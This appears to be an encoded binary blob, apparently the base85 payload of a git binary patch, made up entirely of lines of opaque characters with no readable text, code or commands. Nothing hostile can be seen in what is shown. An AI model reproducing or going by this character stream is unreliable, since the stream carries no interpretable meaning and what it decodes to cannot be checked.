zu?S!C=WPES1w^VyT$sd)Wa&S@Nd9T?t!6Xn3`&(lS7JKsR5Lw6;2F0>58es&XzE+I
zM3wYVTUhS5R146m7-HSN)@u*qUb<{Cv5d_bpSDB%`jV=cJ0z}<acq_lZoH@fq}I8Z
z|8Y;CQ0@~6))2+Dd}fwPT-gHwr$E2IekflmD@8@Wt0iS@@ht-%VqU{?b|98dQvA0Y
z=sLb+p?Fuod?tuxpV5+cP1cdJ<qY>;O}+33R{uNx(qHpo1zWS*Jy^Lt&^RrSs5Ueu
z@!kG*ew0081o=IEoclSF<GBQ4ksH}23FUGg{Oq?CGQn*fdlJX+@uq)|eca0Q%7!-?
zPo<qO--r@H_4cbK=KFq){@%=VNLt5kQMRrziC|Jabr3qclSN}2F$V|MTqps)xjZrG
z%Pdau9M)gA5n>HsF#o7p&H`8)`ULalAHxy&7$ipozg}L=!MuU=hQXXA;u!tBPL8OK
z6JtQ%met>A<C_5h<~YQ<;Nd~|P8&CFu*89cwRrpdGtjLcDir;@k`540V1m7x;Qr0>
z0V}fV4X@<ll$IwCzmuF;$;FQUK<q%0ns_0WNS$ny(v#-NRUUfMym9s-JO~J}1eHo`
zrSE?QO)YF+L%d`J-0}adYESm(&$*2`WgXeA$=w83^xP>&N#gnu<%dp)&InnAk{np9
zJ1Y;1kiqn;;da1N3@>W>DT(O~z`$L=sva2=PesqGS7foOlT6QZEs@=FO)s5A`u0GP
z<u`*Y9?duiht;}Kp713qym;EZTtmVs%iTC{#8g5SIdKdE5CK<VjCN!q|3DJ8mb9G&
zF))Ry44}H*N@T`8heGJ>ws9B&yN+4{O;7FXzWfH>?rT&C+j=P8B+Q`&V(SAo0B!jq
zo(z#o8?jThezmq0?0RlU0^rVLiyH|^baLSWBBHqKnjajKZVfV&)0uMRSkw$*tO3+A
zdlrZ`ZAd&99W2~U$0wdvSO}2SY(#im38w4xCtRs0q6q*ywUaTsiTKA+0cWV$w?w(h
zY7sBIgTyU7rP1}Fyn0wvKZ|B4x8w6~e=w4AE@P>H+SxP?#V8n;s)?rHGSs>zg`8$4
z;{pMl1#eGw5bR#R)TZW3l+%HWRyFI;$_~is(qCC8r4^|S9O>qI)f(%RhOWUY<O=e4
zrA_F9D)|`!Omzt~S+zcdI!@epTC>rUkvs;PlH5Tw6Z>VA!-$p!plDM!n$~rq153O7
zX>u_JAhyjb=r>V&GDEQ7jE@bhm>@LzS*L=SE-R`54~;ve!69f){Lxbx5H!B-S!nzf
zlR+++>MC<*t}#QR&`^i=OWhFB_}Y6RmO`|#^yc7rlzzoY6vn(K9#vzmdA1};$ow-K
zO?hS#zd!_1TZe5|Q1g1CYiI}n7lfYk11c3e*A(G5c6YM%RqW&SY*d6jwFQFunSi9K
z>VyGAWul}saG&4L*o2t*yryL&9$F;04Qnmg#gXvrMwv>w67n?}FXB7<3`2&4b@J8#
zUTA|vfmjoW{3T0MJefwmPYy36Uja@MRVFVr7?9x1_sU>`mf;<=4Q`MDuk+i?bhT(}
zP4#;c0N^Q$D<Mc*J~bzu3w0+k?9zVGu_f@nNFf0hUJH(bw?wX`u)uaF5*-N2vuChi
zV6wfdOTVp(U055M&9le6Pym((Nh2tEtN69edv^J~{hF-q-=XR2eUM%Lms0bhcuyuZ
zBcl`jJ|MYsdyTOG@=@+6rIu?3{y|V@sp_L5jm8Nzu#dZP<o9NG$fOpvX6TfmC~Lqp
zpF&Tim-*cuoxx~d&G5y$)ji=~0zPW~%Cwp<`<3Z6tr?NSea|uCTejh~$c@K$-$iD}
zeB`;vxN-m8MZ!qpa@79Yt#{Ffz0`bqJAQl=f!+7c*XXD~ft<0wzNTo!{ocCY8}oU;
zX*=fP*H-TX3WeGQK(&qjGu(({n)(W0X~#fSNO;CX!ViXpPPl;(9y#CwRc_a22qz_Q
z)RK2}&U0wvNQt6)t~9po{ft?Gp_jZOxV@?_=Nu{d%E0Qe3wtMzj2<QVD#Q(uq^c*t
zinP=G!;NA((G^sgN;6M%V}1@p3WqnQQ@gG)x3%lbgik$`uD^BC=#?WCH<fW$?+)ju
z1<k^oq0E59JKP&EL(#FRtos9Zc#dJ+s&9g_A3)sER9A<zcjdDaXK%GK!;N%5zsh|O
z<IYXbVXW4fn-}1_E{qf(Qo9|T7hF{(a(HfJ=|5dSka8CXzZ|*R5*$|T=+5tYb+l({
zy72966-I7&_}2B7$60?o<dUwMy0Oj_ebn<*c+_F)sS=VC=leo3L44eyA6YUnAR_fL
z?GnbR__)$nn6HmxG!PW<BysPBs&pha>?E&rk@<y;_wYo|R7l|or9fEYtYg^kb4d0%
z_Y198a8fMmEP-0zONXV?B6;GZguX{q#6EJks6B}GR*fhJe~Bsn-%K7?!=@p}&Qy+s
zbwS0Rn2~L#RpFc2=d!lq+CmqSA&pb~4a{x^v<e?n`kBkpmNwMAr>!Fe2C92)JPc>x
zGjVyLgx?xIHqX^;Yj1q2{lh(E>i1ct6lz(m@aP-+zQ|ld;ivk$`u7~{4R3V3vTX=R
zy63o|cJnw18R`H0-tDu_o9}+w3P!|ox%^eL>t~&74q@^Af{L~qRGE8~ow?>VFJeD*
zW3J`#hkEME?Zk1<xz|sr{Jg%++k52RXsy=w^Ra!RJ|j@qR+r>Q@%2#uLi}u-^5(gp
ze^}S8l}47g{n35_N$QSktXG8kq*;SAyBs%F<~yL42hGp^bKJc#-`P^;-`o=IbPzt@
zm9u=%)c>E;N#T5VFi(KfWY_JVZ*IQb*+;}It2<xJ-Ap}MM#SxRIsf~4^K~zMIqxai
z8N{|g^!yZ%e95c@Us>p5EOg`5c-5`x+s}X)3`|yb)K&L&V;uW_lypVI4fU8ko<IC{
z3YC;gVe7&N*<|^Qn;LgC2Nnje3<hO|b>HFrweV338l01);V!_oIAmxLocE~PUF6E*
zuz7ND!E+4{iJOZfHwS|Y+qyku?k|oyLqm#seO<rruQE#-C}d7iq&!vLE{+Ezhm>w;
z+*O-joVY(2QhwHb_u8+;$p_HaqSt)gbl5(VQVc?$vGjNuT=_heog7*vtm%C@DNTqw
zN|23l^~T=+JYzo4`a(<7$LeuZatUkOOWPiw8@h;3PyEB`Jv8rK^pwoK9Sm!1yL->+
z*XQ|OXn1pyrmq{@mxYf8;VqAPd_AvxS)5G%X%xZZ=X3MRXZGTsZEZb%{(M4TmM{5s
zFaP=lJ^r#ZB=W1{Q;)xM^^@hp<ok8YJONSjT{A!4+<$kr?-g_S<ts(xw9aIpw`Am?
z&Q7EK6?8()ILdz&DG||UE_$42QMwAJj$j@wvVEwoO=dUzs&;ich~hkKaS0qdU&8!W
z&odF*V7b5k>bAd4Zua_mRafL-#rX*;?$7EGQ{-p>O)#Rkds9%LlPXLtq`kpW(DWvJ
zR#)MAF>P!$QtM*oarxQQhU1pmsan7MK}h^vn_ZW`SDTBx!V0T-@OI`=Tbzw&?ONM=
zkq@tqL^9leBUyIn&*-$!i`DCMj@_#{`0qbd??C6h?SlyF?yqeBA{v7=A3S^j-!Lq{
z?`B`Vd27DgfGay>k})ndUbNcaO2ba!<LwyX_0I1U24v-}7;;Rn8fNO>kEpoWqo6By
zK{MFX%W~+ikJPb;O#b1E34b2ps=plynp<o<E;vrhzNUTkwso~R<+N%#CGMvd<Lv79
zxc{h|;?8?ZqENS+f6tgpoQeO7THq`Dw<G)SFGXf{xv94-Kl|EW@$T<Gde_0dUq^-Z
zb=9e=-hq`gxl6kK%}Aj5yN;Q}|6|fJ&(k`8NTe^oOz1v`5A>2pF;h%hX?48^y4nY$
z*AU#=bbId@$Fyeasv6a_>b}<!p7EAmR9gjOn5wi{=!hM!wHcQ%++#!mh*ny#Hp)~-
zz+GF^{oU5Rc0^S_>zKB4dOykrR!!R}St^e0?30`AosK3l?Gn$UD`}Y3jnw+Z9Yuu;
zv{eUm45D<!VzeqQ_-kjhXzSnq`_Xs)L`b_z4PBrkb4t`HpuCrN?=MoX(m)LuDGVre
zzvq~JudC7bNOC}>UiW&vp0Tf<`nvAF{DJ4wdeY4Ljx>6F!2>teweNH4%W)GG_t2tB
zeNZ7`6-d9;QlDgZA6DQwWL=Lc<Gr+y)}NVcJf;0VzG!;3V%!Eau`#{--~qQkz1{=W
z78m`<y?&5sufOTL041%-=mDvL0p6v7C*QSom3m!#4Xs)Y-040Hf!{kb4;qJl(1qyR
zmwvo6_Fkh@%rUr@w%g!7<fC=WheXHc_!w=)st@!h`cQ7ekZFBL=*QGh17ODBE%yPh
z0)4N<_f%tp;oN#z>O-EUnBdZ$JUWB+{2?)+Ve@IDwMvREAoSg%F$4C{E<cTrXWxyC
ztOiS#^rP2}a$;1M>aJ#tRbAsYDCpJ#CF<Rdsm|E@khC;ZTc88){ur}vpyRGy-l|vM
zY8bz6pdclBCuWGH->6KfH~n&KHFmxF)Zn4i$TK&S!hw-Z-QirRVFlmb4sN|ibcXMI
zjaQ!-`*a%?J8GA->UGwSzBe6XULX1Wu%??^H|Dgnc-G{`AFU3JYk37@m8~Co9Ci3J
zjAW$V+oT&)o0@6ueSA<quu<0^L1!|UG1^}`@>FjSOViWZntBsFL1vy<6`EL6n)s$S
zv2HW*jXTx%7S>r6EUKEI2*cv#u-SDJ--WQ>V<y%IC=+Xcu$EldgV~7#N6lN`u_utp
z<FSbiy2;ZR^V8Fb6Q#)u4fFq)C(doKe@o4OhMJTAOdPG7{}CenCq>%VAVHKTfsZEt
z*jRu)umEWbsD}kSlLYOtppCVFoK4dEnXlJdFtSV`g{M%;Q%w3(%(j<CViLlMl;$$U
z{>buD!M>g`u~R=m^U0iN!vaY^^=o~SlgFHY+~Szql1+K~@7~n@sVc9NIbD(kv;H)t
zep37|NjTQZhSowX(~7liTB2+U5;i6K$x6X?T0od2&SOolKO^+P>OXD^MYBo8Pt$U3
zGwL5^G(OE}Zp>Wsuu40c!Pt^E9Vf2jV0R%D3sDbiY96c2Q<aOD8G|qz1u83q$E;D3
zGX0|&g&r)h$4aVU7JEiA>zTz$r!pj2D}S<)5&i`Bvo&F{vHM^y@OM_K?UR1kjM~1r
zeb1*GXExN!Q`~-7hchd+aa%jZR6E-_505#|up21hRQBho7SVH_^i~SWHr!@5MxQ>h
zX--=y-{5?1<H$4Z{C9>s=?2f=PqOr%{CjNWd2H-F=EGxeT7=EtY?#;hFfXTU9ra<>
zLEko*e$GjM1|N3QU-L#_!ws3Xo5@ZKDM<^dkL)z5taO~FywAX!@}@yb*D-%Ip3#lf
z>GfuYjxCiMJ@GZ|4mExkBmAhx80@Y$p+q58`HDI@jC|0$^k<p`o-TX}9W3fLdn*0m
ziS5v5_aReeaYtr{-q6KjkCAKcBPyp0AC`>&%@~iG8q|Lp<gYh$gqXZO?a#K+P1*a1
zS+aMnGQ*8I<m=x$|6xY;d0{ZdOmA<r`t<s`q<F?deT^lPdqQSK-KH&x*Q@mVpXuvI
zUc#Rf$BekI4?em^XfW>6FiEU8<$}DZ(IEQGju1}ACNe&|&N@!l8?-Qw&z9aQ*)UuP
z75;7VvY<g*Uc*STYH6`bw~42E)^_A=EPD9QzzU1{voVv|M}wM5<63|0d;czW>MwRn
zYfgL{@0Y&a_~`cg(ZzwD_Y2COtE>%nKT*u~=tmwT)*jj#YMc((x(|QXU*7v*P!aq7
zt)oMPsdK=dUjP2}A?1&wWsXJqAK6b=vQ584a+^#)T1j5gS^j`t@mT&VxKfZgmjAu|
zWPiwb{Wi&QaGh!iAfq8Hq?K&+@xQiP12!vg|E~*wiR?PJ5i0%vJZ>*TMt~C?+bm-h
z!ea+X+8nJe+ikahmYFt4jZcqv&NDA}DLYQ@FY)vC2zHxVS2-2<Vf6nv=P8p#gKvET
z4!+HY?KiCDJ#mv#sQtmyTYtjOG|`QI(Ib`IA&p&mt9yr}xptSXP(_4a(Lbk|Nv)@%
zOF8b2#zYTohx*vVwfiAM17qJlKYEHOr|`qF)U<dBD}U~kDY_d>bnDac>E7Vi!@8^9
zb~o~0e-Q1i{{mrL?rs*2Ho?Lzp=#DE>oM;&GzSr#^jB>>(bsQCnqoH`-fY|&+;E)R
zaN69s{d2<^y6M8Y=_<16rm}g*VAK7^ribUIXZYsb<V~-_P45?*K5sVf4Q~3*ZTf9)
z`v2SvfNlk{ZUu>K1*>d@7;J^!*b4L93J>49pS%@OxE1+gE9%Ww^x#&^+*a)7R@~36
z2heRC>o#6wJ6>fw!C*V_#&(kDc5?W3O7eDU;da`K?esU>4+pn1=C(68x3hk3XG3>#
zSa)(6cIry>f8d`R6UDBsf%3z59w$?FiVAn!I&17}y(MaP42yQkZoGK1x$_jdOJLot
z@DyQvA@L+Z_^HV5bI;uu;XcV$yJnp`52tsk-|T9o@7B%jHf-)ThQD0U@ENM~$P@Wa
zFX-cSypBgFWO%?vi}^GFcryU}Eo<SJJ*>U(yJy9{socweA+c8lqKJ5v>2i<Z7>udO
zkuge;L8mI6gWsp|D4Zu;(&!MEQEW|_7Jxg1*Qb@YT}SnDkp`0L0uT}d+~?rbMnLen
zeEsL&F{+U48UWnusVh9;+IE5(JA>Z&J?&IK_m2H*s`$AI=IMxnOgjJ^mZ;m8BbS2%
z0hnP(dgffPybD0$YN5#j1xQ~6%CJC{4bkV5AHLl_SSU^~(#B<S+^sOU7jJZcK?9~$
z{ANX9!xnyXS$zF+U|qWdycnJu=lih8FO<KKJm;543eZJBHd)~s5jfd}R0>02mONxt
z#9#2Le`Z7g^etj5`2b#gP*!tbLiE4Wfi&5El<bnggTM_K<-H?kXGh>Twi56~sN<Y6
zZ%fW#hTWep7+AK!igF2G{Zpr}?e`slv|*4xg-;cRaQPJs%I8N9*#qw&!Dy|c#K2%N
z*|fz*zlWEsee+{E;>p7AOKm0S`_NIw!V&%Pk<?@V?_{_<ItaIV<bq59oO7hu0qVDr
z#zb0x3*>B$l8O*z)<{jq6qR`!ABG$Rbw{%;{kumO0TZk~6grN_*qs2Q{8g({C1eXF
zC;e!EVTY`Vmgad1kIUp>r^+8wRpt@K+o6cZKajFPZn=<87LQWM^lAL5T-nE2H4J5d
zX8orb23x*_pFx*S5wpht<@1yH^LX08q$y9_Rydo!7tkkrLXZ?HA`4SNz%X9Gn?->}
z?EpD;r39k{6yc{jpOQ*o5-l;n&yc|emns|htNR*E1;Zd$bcDww;upe=&@dx0AWjyh
zpZY73Zy$dSx*3=h#&>x%b`>MAGVV}OZuaJ4IO83dEL*B~FD^wCHlPC2UkFRYByNXN
zK#}*U;^y-;2@!ZgWCG?FZBC>-?8mhsHqnLfo7?y229@yV3GwEsvVa61Hke9HWV{7L
z<^M?ciJIiV2ZmX=!}}WN_dtQ*RdfjLuLQpUd?GO_>_Ms^4EI7Vp%R%&RfD5b#g$);
z2M^&OL%|wH0A<WWfE+l-H5}9qjD7_Hxq#t-!+#6-c2R)p5bg#0K|Ff^_ub!MFB%h7
zy!!nBxSgLUF(LBtZ@gDTlqgJLA-q*K^$JeeXd%2IC1M@+_sWCc*(s??n5?wJ`*`+f
zpSv*Kw_)l{=Zf>-D=;wB2n>75Y=ld^?y@fzad|O#F5+H-MdFqgo+*$Lgujck+AhFb
z{L?_N_p65FKTRO4qT-1O3aWUzc6{Ffo1W@1v^ha5)ekeDrXAob`XKlh8yJ^!y77=l
z)P1B>)p8iFE1G&_2LJ%{UzpOp$HcF{<kwYTRB#u2ohCS(C!{3;(QTngFcairbpz~p
z=xTT<l#0F16?`TUg}UkrumT$<ib8Wt6SjmC6c{a-eN{g`)Pn>YtpOu-aKnwad*kUP
z!=)BmJSU%-)rCucdE@`JKU4C)zr95G;o5lJec7+?;wT`f>3o_~a=H*i%~Hn<Z!L0s
znzkfL!t<bL(0&nmI(*8WV-cz-u^g@@Y9U;K?=~)<$4BjnJS8+iNPyaBmVH++6);Sb
z46}(?HWb!HlxmtoY2G9zen~E$Jc#9rggvCstP>NoHzR1Kmi&sG=yIjf7F8h6jbHTb
z55+%ItVi>M-tSauF;NGTl@GqUZ14qYM|Wm^w75&fnam!W-BUQ|9UJ2bGsD`*ao(6b
zo<fB57a!l&b*mv6>g4ShFh~ASF8IPg9lE)ah%Ep-;lL-7k|6O??$ZhRnc+IRfkVGO
zhkT0NDCMt&KeJ-z7nv>Rj4v9p49wMhjI)F42_XU8fe0hr+wR_J`c7VO9E{%8ezUL;
z?NS8vaBxebaxLG1pzLem7;2$$?Nq%&_Z!p52>)S<N0yUx;2mLdQZ-1Fo9F0OpeNl&
z1h0fC8`nL0d4zpNZtNRz!>3l_w{%_6;qla^JD#wcE@61@yKA|j4nBGC6Q7&u-Eblx
zI5j9uk6vtEzsPSd$D=^*`ha#88X<wC5z?lu7FH^D(FW5iB@R6mk`qd%M(q!ixJ8VZ
z`)sk~se8qq-2Eg_hy$Wp4?ZOS5sH#;@$ZW4|3U(xr~*Ny8*183g^q=TfR1Y3oN8h9
zOk15o?t0^V@Q8|#cA;gPNsX|l`%n&uH4uaQI37$KWC$$jLsBE*%`Ju3N=#S)ekub7
zCA8-1MI>D&r`9P$!LrtA6GcBO7js=6O53aj;|=zV#~VR*z_5bWB6M<$2p-~chqaL!
z$@xE;&cZ9oHtN??Opr5lGjw+&>d=itBLWWHNJ@x0ARW>jQqtg%k~*YxiGYN(f<c2A
zuXFg$cg}kLgJ<1q-M_u>y{~I~EjcP{F*_oPC?2041vy>wak;?_1<%}E`shVA#I_OW
zr=x8f6I{LiBG`@tRk%LDU_F`=HS}=Rjb3m(WcwNH^y4~(>D8J$_{o2v-X`O5XF<_F
zw-V{%)?aglz;pOsd<Mr7nj-Ll&Ub;OLBn{+i<HlbPV`n-B82^bD#RoFOdMV{^8vw=
z8atX&$P!oe#KhOn%(F7UYW2s@z|f`XukMkWg34>lY<m8BQwjDzbshZ_3Jz8kD@UP^
z{}>^;uk@M2hhHlH=MfebNPIz#f9oKOrF7WLD7b}2l^=`TVI~!tfkU<7AwWPRz#Xtu
zxh)6))bTln-Yw(f88B<8=d;IvF838mLGe+lxIz1^B5cf<g|7^Fk_~+8tbP2ZM?9tS
zK&Fse>?*`jHAA)>%@e4&8Ae8fp+tKa2Mv9{`31{AR{9Fh-+%%Q-(!z|&sl_xw||MV
zbEqNasH90Ut{4~yPu?Sw>d;0hpk*mBEU;~P7^4Cv(gCC1y&E4bPpd^4Us{^;c_=bZ
z8EBI;#0+TQOQ5?n$S8skVYj3N4d6VsDx#TiK{QMzAi*GKS%XklenUOSBW35$I5~;0
zT1*~8M;YeCK~whHA##EnO<!ig+yVs0reR@|w4}#;SF%j89%^RI{2CIG)%h;9#zt&{
z$`c;bf#tHrU!5lwRt}~^$YUieSJy2vtnj~XBHX<Fh;GLZ5quG!EyU5BtGzs2tUxju
z+ysNhI57|Yd<rSpNzQI<4w(G~eZ=H9z{2dv!rDHE;3RVX2$fNl?G>TwLPR@hhF5@l
zBe_|wl4<EK+S3W#rpv7vbT-61P?lJQrm07$ZM$Yc3Ea&XKbV5~5<Las(T6cpiBPi6
z?N@Rm9}8h*@}J!zw-bovLvb3dqRkG4q{GN5nZR!rJ5J%-{LM0&z$V9=tXgD{7sA+|
ze4VDCAi3%p;WD}*R}sOXx)+i2CR|yhQ6ycjTqUo3w3ER=>=z}5r|Oio_EUsK3zn#A
z<(Kzn4Yy<L@2c~MwrQ#jp%KZ$9!|S5-?WrU0l?^UxJ?T=OYyuIimx8H7haV^jfas@
zQaBjzzkk6vfz)G8Q+$fm$g%yH%`%Vz@M#sgpVE0<0=ILUQ4Q&S#ttoO>LgW!A=rEe
zu@AWgkYs8MMvY+5NLCiFqb!YvwkW(LD%&@VBg1O+s@|sD1m&=jz`S2mO+?WFlKrBt
zN!kEerOy-ui%mGT9*B0vS+50D04dwo=*UCz`hGKLAWa+%09usb%u%Y*G$_MD5}2$j
z+6$flqBm5dezD6$aGi`Ku?207TsZoCvivxv?+nOuUB50yGyznar^!?1QsZ#sdl<dG
z)%^qlzsMY!=4nGNFP|E)>mWL8PKhoQw+W9qfNcBfff+^3&>~wv+=v0?QZJB`-8%u=
z=3jW@-cs@Q-&d&5e#IFjaxX=F4h)>SxsTW6syCGL#J&5uac6Vnyn!`R-#2BA#l@Ut
zTI-Gj$fe1GS6#B`Vo{Wr=F!*^opdZ75jX^_2>a$PWm4Y=J#5bP@X)igz`Ja1>G7oT
z84Z8+7Ly<@Dbs3j^Jw6M$3mA+gfT#s@if$xO%cwnJ_4Rp*XZvo8;c%8SsrJv*WL>t
zW8Ut0H|Rq^kvjM&kK3JwaUjAE&BjTuZw*ESw&$B$a2hGA_|OoZhX$q54)KOA!z1$2
zp<BxOF7eB63f{Eq(|RxZjJEeV_TekYKbl@!Z_Rw6D+%Hub{=v7#$2%{;@fLHtwSM?
zv}s>_Y?%TqN3$s{LmzOe&>LT&6(28(CdO<<KiVCIw?voHrV@N)G%2H6{;_=HlSGch
zUQs6+JDAa#d|*E?=L*;bcB=i6Z4LW*GkD4?Gak4^%bx(2pzB<pQ@AB3d7L=4+;9_u
zHjtZR^Zubasx<Z5%A`e)CH}16M{93te4L3_`8Zlj=&^yBUzDQRT3S<2iJf4l+8pns
zqaeQa8Hs(4Dg7fE2-(?pg4X%06|{)Y$!MnCT$CXQbd3z(ETvSudS?9)hxgGd=6;r?
z%gNf(EU!&@CJzMuxD)g8<}JGOFfa(ltK{Uk_v7!<Z&RhDNuvj4Qu?>vGZJKfkVs%0
zfP52>qgl<e2^@KEi(fIbo7OT%;m4Lg&aJvQLvLPaqbCdWMs*@Fsoe2%puct<TS&d{
z0O)7km|1GG3pFAc8QFZnv_FJxXgN$gNyAnfF@@c*(~OVL{1nd?Ll20eTs!j9EXNh~
ztm9ChbU|sryWgiJ66m{JUcl1sb$%xXj?P&BT4{kyxGf|MJcbYUF|4m)bfr@-lGzVQ
zdPJ1HrgIIO^+{~<O`YwqED9Tj@j0{)pMzB|yUq|h1#8*ma4hpp2FF=$oxg^lcnnLH
zT8FMC2gL4EauR1YJ&&d#zl$DB48#%{$&N!bW9-1X93Oxf>NFiqrKBc#D?Q@J0_klK
z+G^Qu$z>m?mrQgk!Xaa0y!wkjZI*L=9$}g{(z}Y}vK``#rGPgv=#7?fi&1NYT97qy
z>xBXx`PlTB^L7}>K?&&)G61>w=!?7RU1{n3MMS~8A;Btuj%Hpro_)lS$Yb6=oR`23
zS(5p87u>+=Bgd(+%Q=%b@kTe#`edlkj~L0q<)b%G2#PAyjXsT`I1}e1C&>fI^R{Z(
zG1{Kac&VW;!FaYdDjw&tvQB3HyP$|XP3BJPK4<OUz)I#xLvWtsry|r}giW7P&V1KS
z^4*w%yXpqbk#t3d;Bzh@>z)aZi>b(-EgEO0vS(*b#Sk9}#?7!DM@k>Y4JXj2WDU_U
zV4f33>mu2qiFUt{mavinroZcT<~foDYGebeacIzT5FGl3#!fjmv`p7(jdjhIcWl_D
zqiijs0mtk(b8q<N<*yY-3nv?wwOVuq75UhMc$P+Sr%%cF`!@Q{#61_!GBi7nLk^O;
z<pYfbG&*P$fqX~JSVh}XM(1t2ela4a5{dY`z9#;;Z%)AV);ldyw~2E`w7U$A8~t9P
zk<+F!HB{uwCT2^^)~p0T9M3ltfL3Sj>4Dj!=4*!p1+J}&9RB`z!3G1-l7huO7g2RV
z^2QRqc-&nT$QqEFqGOqg9RpXIb3<#L!PQ&zu<==G;J+(Y?o<?YFWtx|-ym##qZlGt
zx0~P_EZGS`Ekzw!6Jyp<N>dbNLPRQ|cSbe?EzTUX%@c%CwZq6LAT#l%1s-TCq+`AB
z*sKPPa4K2*bo+N1=F&i8)LlYv=#`L-Y#G8pg%5z?GwNoc#n1BdzYmzQ&PTqKjl{OP
zBX~6(CH-kZhG2!mnu5}eiwmwGL~VLG%DaRM>KDyNg7bmI29AGB2HgEJu#dO~ffvnt
z6t4&u-*PG8#F_tl9~c2mAhIIEtBxc1HEM`XGO0{yFD;7qK82!n=xesy_xLy6Zt_>5
zpTzEzri{rCm5qOi6T_cP-m$gZks){MH1BtKeve4S?R4ncqxSiw%Fq*MPjB<j-o~Em
z?E3M?v2Vm{^(bx8e_fa>r`$gYp#H<%DPGtdvZ(H;BKC@uOC+!&%Oix49s!9_HUc%b
z;vT(Ot!{B8dN4kdxFhSB`a<P7TCQ4NE2&`Fg!I=Crpg;si+Jg-2X2de7+&5H<klCz
zU3{T0(2&GS>!DG4AY$s&GoWWbZtx7`#1&E2K<a>oE{Hs#O|L0QeENpk?^+O|UAM~a
zr6}zFQ^)}=_a%*!Ir@{AMuz6MYvwg!Kv=qvE=#S)MqNC-hB?MPNSnvo1;p)6L3~K$
z76K$S32GE=Y+EM}<fPyBq`(XaJh#_Em}B#=YNi($cor!p1U62)?s69)C%luo<PQ2I
z;3Y5JAm$$2S%~cCi35Hft`YVm25cS=^WP7R{DkjX)_DajwH87);ST`|pFFl$54U)H
zmAOl+4m_%<w0Y&!%afn`VdjuA_gsFZag4vKi|Gf6i8RW4GOKyQ=ZmZpuAh^(>oPQ7
zt9i4f0a=37n9};Wuw0G6JaXl)vIC!8NPtz!{JN2Hku~T0r-ZtWx-GB6rXdLnL_?xm
zo*LtHk(<2(bY)?v;JX#&)?~Nk`X*%u^wXD1LqzGj4ON<B^>1FZqV3b4PopE5D0i$s
zZgsSL2;4t>9X?zeOW_9C-VR1HI}dzoiTwVi$qF~dT80OxVnBk&<PEMd9FuFn_l6=I
z&6>*(PwPWK4Vpm%-GA?<>JKL$G*VhHL4^pQjXEN_|KbV!<t>qGLH+B;DPe6G*6S^S
za~^QA_GQes&L0(A+EvLhVl@GK`tB0tPY{kp-@l!YtD~25tTXu8qpasd0cb*Diar$0
z1p9#yE!ub`kr8jqF@;MIjYKezoRS3!Cg5oXd?LmCnnbdQ{!4lB!@I=I!;%FRpl6>n
zpZA8^=cH+X@O-TBE8Jum+8TWW$fk-R)8v%5(_+f<15sdpRNW^h`hNeX#yTr;rnF30
z&PTt~gW`dloBaj5y1y@8#JP^FgS6H&X8rUvfno!xpC|r=4e*Ebb4@mN@%u{tIh6zl
z-V>A9QIJr*DZ#&6^vD$e?J(&aV```OUkre7<6qrnb*1>jd%%eQi?{tc;^wD4@*{Cr
zt;>y~jmUyYW%=t#!H6loYT_z5Iv{`b)%BYdf1(pl+3Dr;Pj@YV?B#<ln<0D%=RGFh
zj<bQAaS6C@?4iEU97s6n{O+f`2ZQAgR?NTocR$FO6sXpI!2D#2jrJ?sz*+0(lz$nT
z=!ZC}SS{eaDC+x5v;A?3!vU|)$;o~ul07Sb`^4=P{pbvPV!4l<#^0i7t!-;_r_#?x
zbtkD5ylvcBjIY=Is8fRwKMJT7Abb)1()J=qwwm5#?R{|*lxz)o>Ktv7FpMusDF82b
zdnuVEid+|hKsq<N8-NMwoJ$l7-OS817e(%P_R+SSA=F3xAzbD%S+Rc3f;-1O`6DVm
z76&}L@FmwhY5OCSC2ePyGflBN59>VQ1*%Ces5q0y@RJ0EcX3PZlhI#|0Y)9Cf+AMj
z&U$ZWPr0cKXkmfAq;HqLX9^B}tkPycKc>J1N^MwEAT~(5c$OmyJ+QQyvRlXY$o$MZ
zRzhLt(*~Jn6rtZ`AAM4F2R(WRu~2=e?&XMKcPc`dagS)(EEx9&j@+tO4VhD1I&&l|
z-$vyuCKtiXiK7haO>;KDHQ%-vZ!+whC-e^ajG{)em6teRS#@VOOPkxAm_5bexcfzu
z>nOq9Hr}=k)V`D{X1tRJ)Oiu_B+U@=Jwt2C+s`<NOJoaK`#P6?7#MNS3h51#y2pyd
zaPJv0{M7?nZxFr@sZuBX1e)>qZNG7J6LN*GcoNwYmJbgMi;^`B+nGyBcTs-$6&`X&
zCC2ZwN{>kuBA4-VAA9$PRnBWAFwV)gsQkqLqCAm-iLaY^Kkh$ADT>{7s<_+Qg8j$n
zbKR@LDSva(6PGZtbJK+t>S<teuiCARcv)j2u~`w)FwM&}*KRs?qVo;$+`O%R>RtLm
z;b(Ug#9uwk>!?_gC@2WV=qB_df)%Vso8b*f%|i&fo>NHj!-`DdsWjL?dCRYljb0R|
zeM-MGv}n<<CWMu9Vxp$0Yl0q_J!-%AhxDI<U*M469V36PBH23Zicq?i5#Zu(Y@l20
zZn8G?7|6E96rv;-e7}|XvG-z%HhdY#<~^$R{wyYSWT@-U#$<3*vNq^DkWC8ZG|OmC
z79~nL?l00BvFZCs4Lgc>6!N%7AP&aXWrv}QvTzJCXK<!x^gxGjVczsWofbC57hS9=
zZP)NXwn>(cc0&xNmi(iCpD<+Q-C6s<%<1hJTI;DgJK?JHf?>@W@VF!^K{mQIfw(d!
z79#hT1rxy))ZXeC`)=^+mpv@cO`gXYUmOyn``c8)ALG&H4~d`1x&e`r$HU}KeI%7b
zRKlPSc%{U5*o#a!{S&%^PG8_MS6kd7(sNs?$iuuZ_~WP5gCZlW8=mCs)rt)0OFMAi
z(h(&QWS)?9Rrj+<#W7Jo4iof0O%VRe5XE)Ctha0kwhoRC{>2lB-AKPl-Y4H@9c4kf
z<JTp}JOOV=)YD9(5{6w%=ZQZY&1QYXa~F)8kLljR?HU>CTLS;-!6sL^!AY#CSXfp+
z*>RC=oE94|03Ou+_ST&a_X&DcB>CQ~k#7Pyk~kA|kg4L<ym8rFk;d=b{C0(*^&Jdj
zO>j;aOrc~%+7xULje!u6aH%Y%bVscuCTZ7&&U7c8R4%nxdgTmfy-Y!qD)X+4JslBA
zhmkC0IsuIWbMH?JU72n(1>(i@8CcxFFqtm-u0y<TRKcy-NeFr6b<0zq*5EwMGrqn6
zY`TtXKyO8BN>i5Fy9l`gO%lBMbT>T(M1~R=$QPR7>M5*EwlBNK<Evk>kZN47K>?yC
z7>B{w%G31FwwfU+k>C4v696%d-edt8j0$dh4oUk?!gas@#6p#}?OzPLNrSD1%>lVg
z7SVAHgi=WSyrN^|s}@OXw1#`s<e=tI%<fOAG)oohhpTtpC$wZX7Yq_DlWYb&7M|0&
